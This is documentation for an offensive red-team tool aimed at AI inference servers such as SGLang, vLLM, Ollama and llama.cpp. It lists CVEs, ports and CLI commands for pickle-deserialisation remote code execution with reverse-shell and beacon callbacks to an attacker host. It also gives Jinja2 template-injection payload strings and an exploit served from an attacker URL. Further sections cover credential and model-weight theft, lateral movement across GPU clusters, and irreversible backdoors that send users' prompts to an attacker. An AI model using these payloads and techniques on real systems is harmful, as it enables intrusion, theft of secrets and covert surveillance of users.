SPECTER SHADOWMQ Documentation — AI Inference Infrastructure RCE Engine

TABLE OF CONTENTS Installation Gate Architecture CVE Reference Subsystem Reference CLI Reference Report Format ROE Configuration Defensive Pairing

Installation

pip install specter-shadowmq

# Verify
specter-shadowmq --version
# specter-shadowmq 1.0.0

# Dependencies: pyzmq, requests, cryptography, dilithium-py

Gate Architecture

SHADOWMQ implements a four-tier gate. Higher tiers require all lower-tier keys.

Tier	Environment Variable	Additional Requirement	Unlocks
`OPEN`	—	—	SURVEY-INFERENCE-INFRA, REPORT
`INJECT`	SHADOWMQ_INJECT_KEY	—	PROBE-ZMQ-EXPOSURE, EXPLOIT-ZMQ-PICKLE, EXPLOIT-ENCODER-ZMQ, EXPLOIT-JINJA2-SSTI, EXPLOIT-VLLM-VIDEO, GENERATE-EXPLOIT
`UNLEASHED`	SHADOWMQ_UNLEASHED_KEY	ROE file: "inference infrastructure exploitation authorised"	POST-EXPLOIT-HARVEST, PIVOT-GPU-CLUSTER
`DESTROY`	SHADOWMQ_DESTROY_KEY	ROE file: "inference infrastructure persistence authorised" + --confirm-persistence	PERSIST-INFERENCE-HOOK

CVE Reference

CVE	CVSS	Target	Vector	Port/Endpoint
CVE-2026-3059	9.8 CRITICAL	SGLang ZMQ backend	Unauthenticated pickle deserialisation	tcp://*:30001
CVE-2026-3060	9.8 CRITICAL	SGLang encoder ZMQ	Unauthenticated pickle deserialisation	tcp://*:30002
CVE-2026-5760	9.8 CRITICAL	SGLang /v1/rerank	GGUF chat_template Jinja2 SSTI	HTTP /v1/rerank
CVE-2026-22778	9.8 CRITICAL	vLLM multimodal	FFmpeg JPEG2000 heap overflow + SSRF	HTTP /v1/chat/completions
CWE-918	HIGH	Ollama /api/pull	SSRF to IMDS/GCP metadata	HTTP /api/pull
Path Traversal	HIGH	llama.cpp /v1/models/load	Directory traversal in model path	HTTP /v1/models/load

Subsystem Reference

SURVEY-INFERENCE-INFRA (OPEN)

Probes 20 ports for AI inference services. Returns InfraProfile with service_map, version_map, cve_surface, and attack_score (0–100).

specter-shadowmq survey --target <IP> [--timeout 3]

PROBE-ZMQ-EXPOSURE (INJECT)

TCP socket connect to ZMQ backend ports. Sends ZMQ greeting handshake. Sends benign pickle canary to probe deserialisation. Returns zmq_exposed boolean and exposure_confidence 0.0–1.0.

specter-shadowmq probe-zmq --target <IP> --port 30001

EXPLOIT-ZMQ-PICKLE (INJECT)

Builds pickle payload and sends to ZMQ socket. Phase 2: reads output socket for command response. Returns ExploitResult with success, rce_confirmed, process_user, raw_output.

Flag	Description
--command	Shell command to execute (default: id)
--variant	os_system \| subprocess \| revshell \| beacon \| obfuscated
--callback-host	For revshell/beacon variants: attacker host
--callback-port	For revshell/beacon variants (default 4444)
--obfuscate	Apply obfuscation layer to payload bytes

EXPLOIT-ENCODER-ZMQ (INJECT)

Same as EXPLOIT-ZMQ-PICKLE but targets port 30002 (CVE-2026-3060). Encoder process may run as different user with GPU memory access.

specter-shadowmq exploit-encoder --target <IP> --command "id"

EXPLOIT-JINJA2-SSTI (INJECT)

POST to /v1/rerank with GGUF chat_template containing Jinja2 payload. Returns SSTI output parsed from error response or model output.

Variant	Payload Type
subclasses	''.__class__.__mro__[1].__subclasses__() chain
lipsum	lipsum.__globals__['os'].popen()
cycler	cycler.__init__.__globals__['os'].system()
joiner	joiner.__init__.__globals__['os'].popen()
namespace	namespace.__init__.__globals__['os'].popen()
config	config.__class__.__init__.__globals__['os']
ospopen	self._TemplateReference__context.environment
import	{% set x = cycler.__init__.__globals__['__import__']('os') %}

EXPLOIT-VLLM-VIDEO (INJECT)

Sends multimodal chat completion request with video URL pointing to crafted JPEG2000 file. Triggers CVE-2026-22778 FFmpeg heap overflow. Also supports file:// SSRF probing.

specter-shadowmq exploit-vllm-video \
  --target http://<vllm-host>:8000 \
  --video-url http://<attacker>/evil.jp2 \
  --callback-host <attacker>

POST-EXPLOIT-HARVEST (UNLEASHED)

Runs model weight enumeration, API key extraction, GPU cluster topology discovery, Ollama SSRF, and llama.cpp path traversal. Returns HarvestResult with weights, credentials, and cluster_topology.

PIVOT-GPU-CLUSTER (UNLEASHED)

Lateral movement to all GPU workers in the cluster. Auto-detects Ray, Slurm, or Kubernetes backend.

Backend	Method
Ray	ray.remote() job with num_cpus=0 submitted to each node
Slurm	sbatch --ntasks-per-node=1 --nodes=ALL script
Kubernetes	privileged DaemonSet deployed to all nodes

PERSIST-INFERENCE-HOOK (DESTROY)

Installs persistent backdoors. All hooks survive inference server restart.

HOOK-CRON: @reboot and */15 crontab entry with callback beacon
HOOK-ZMQ: Injects responder into ZMQ event loop — all requests forwarded to attacker
HOOK-API: FastAPI middleware layer logs all prompts and responses to attacker endpoint
HOOK-MODEL: GGUF metadata trigger — model re-downloads required for removal

PERSIST-INFERENCE-HOOK is irreversible without direct filesystem access to the deployment host. HOOK-MODEL modifies GGUF weight files. The --confirm-persistence flag and DESTROY ROE phrase are mandatory.

GENERATE-EXPLOIT (INJECT)

ARMORY HYBRID: DB lookup from inference_infrastructure_rce category + DeepSeek R1:32b synthesis via Ollama for novel payload generation. Strips <think> tags before returning payload code.

CLI Reference

specter-shadowmq survey    --target IP [--timeout N]
specter-shadowmq probe-zmq --target IP [--port 30001]
specter-shadowmq exploit-zmq --target IP --command CMD --session-id SID [--variant os_system|subprocess|revshell|beacon|obfuscated] [--obfuscate] [--callback-host H] [--callback-port P]
specter-shadowmq exploit-encoder --target IP --command CMD --session-id SID
specter-shadowmq exploit-ssti --target URL --variant VARIANT --session-id SID
specter-shadowmq exploit-vllm-video --target URL --video-url URL [--callback-host H] --session-id SID
specter-shadowmq harvest  --target IP --session-id SID
specter-shadowmq pivot    --target IP --backend ray|slurm|k8s --command CMD --session-id SID
specter-shadowmq persist  --target IP --hook-type cron|zmq|api|model --roe-path FILE --confirm-persistence --session-id SID
specter-shadowmq generate --cve CVE-2026-3059 --variant revshell --session-id SID
specter-shadowmq report   --session-id SID [--output FILE]

Report Format

All reports are SMQ-{hex12} prefixed, Ed25519 + ML-DSA-65 (FIPS 204) dual-signed JSON. Saved to ~/.specter_shadowmq/reports/.

{
  "report_id": "SMQ-a3f8c912b40e",
  "tool_id": "T156",
  "layer": "L54",
  "version": "1.0.0",
  "session_id": "SMQ-a3f8c912b40e",
  "target": "10.0.0.1",
  "gate_level": "INJECT",
  "cve_exploited": ["CVE-2026-3059"],
  "rce_confirmed": true,
  "process_user": "root",
  "wmd_classes": ["inference_server_rce", "shadow_mq_exploitation"],
  "mitre_attack": ["T1059", "T1190"],
  "mitre_atlas": ["AML.T0043", "AML.T0056"],
  "signature": { "ed25519": "...", "ml_dsa_65": "..." }
}

ROE Configuration

Create a plain-text ROE file. The file is read case-insensitively.

Gate	Required Phrase (case-insensitive)
UNLEASHED	`inference infrastructure exploitation authorised`
DESTROY	`inference infrastructure persistence authorised`

cat roe-unleashed.txt
Red Specter Engagement — Client: Acme Corp — Date: 2026-06-23
Scope: 10.0.0.0/24 AI inference cluster
inference infrastructure exploitation authorised
Authorised by: Chief Security Officer

Defensive Pairing

Defensive pair: M172 COGNITIVE INTEGRITY SENTINEL. Detectors map directly to T156 attack surface:

SHADOWCOT_BACKDOOR_DETECT → ZMQ pickle deserialisation in inference server process
COT_HIJACK_DETECT → Jinja2 SSTI patterns in /v1/rerank requests
REASONING_EXFIL_DETECT → Anomalous FFmpeg invocations from model server
MEMORY_CONTEXT_POISON_DETECT → IMDSv1/GCP metadata access from inference namespace
ALIGNMENT_ABLATION_DETECT → Unauthorised GGUF metadata modification (HOOK-MODEL)

M172 runs on port 8172. Pair with network-level monitoring on ZMQ ports 30001 and 30002.